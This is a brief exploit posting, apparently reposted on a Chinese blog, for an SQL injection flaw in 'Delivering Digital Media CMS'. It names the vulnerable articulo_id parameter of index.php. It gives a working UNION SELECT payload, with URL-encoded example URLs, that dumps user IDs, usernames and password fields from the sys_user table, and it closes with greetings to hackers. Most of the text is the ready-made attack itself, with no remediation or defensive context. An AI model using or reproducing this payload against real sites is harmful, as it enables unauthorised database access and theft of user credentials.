Delivering Digital Media CMS SQL 注入漏洞

[ Vulnerable File ] 

   

http://server/[PATH]/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ] 

  

http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ] 

  

[ Exploit ] 

   

http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user-- 

   

[  GReets ] 

   

[+] :claw ,harD , exploit-db.com , ALL HACKERS MUSLIMS 

  

  

EXAMPL:http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user-- 

  

       http://[site]/sitio/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--

原文网址： http://www.upx8.com/article.asp?id=648

转载于:https://blog.51cto.com/ypc2010/326188